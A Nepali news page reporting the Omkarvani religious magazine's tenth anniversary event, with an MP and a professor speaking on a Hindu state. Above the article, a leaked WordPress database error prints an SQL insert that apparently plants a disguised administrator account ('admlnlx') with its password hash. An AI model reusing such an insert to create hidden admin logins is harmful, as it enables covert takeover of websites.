WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYftjQZ.IOaTzJ4qNOyz8O4uqX9waC/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-08 10:53:54', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १९–
सरस्वती पूजाको अवसरमा ओमकारवाणी धार्मिक पत्रिकाले आफ्नो १० औँ वार्षिकोत्सव मनाएको छ ।
बुधबार रिपोर्टर्स क्लब नेपालमा पत्रकार सम्मेलन गरेर पत्रिकाको १० औँ वार्षिकोत्सव मनाएको हो ।
ओमकार वाणी धार्मिक पत्रिकाको आयोजनामा सम्पन्न वार्षिकोत्सव कार्यक्रममा सांसद गीता वाक्लेले संसदमा आफुले संधै हिन्दु राज्यको बारेमा आवाज उठाउदै आएको बताईन ।
सांसद वाग्लले भनिन्,‘मैले संसदमा जहिले हिन्दु राज्यको बारेमा आवाज उठाउँदै आएकी छु, हाम्रो देशको अस्तित्वलाई धरापमा पार्न खोज्ने काम भैरहेको छ, त्यसका बिरोधमा सधै आवाज उठाउदै आएकी छु, म कसैको डर मान्ने मान्छे होईन्, म सिधा बोल्छु सत्य बोल्छु, हिन्दुराज्य आउँछ ।’
त्यस्तै प्रा.डा.माधव भट्टराईले ओमकारवाणी धार्मीक पत्रिकले नेपालको धार्मीक क्षेत्रको बिकास र संरक्षणको लागि ठुला योग्दान पुर्याएको बताए ।
उनले भने,‘नेपाल धार्मिक स्वतन्त्र देश हो, यहाँ कुनै धर्मलाई हिन्दुधर्मले पक्षपात गरेको हुँदैन, यति हुँदा पनि किन यो देशको अस्तित्व सखाप हुने खालको काम भैईरहेका छन् ।’
कार्यक्रममा निल प्रसाद भण्डारी, पूर्वमन्त्री दिनबन्दु अर्याल, प्राध्यापक भूमा पाण्डे, राधिका भट्टराई लगायतले आफ्ना कुरा राखेका थिए ।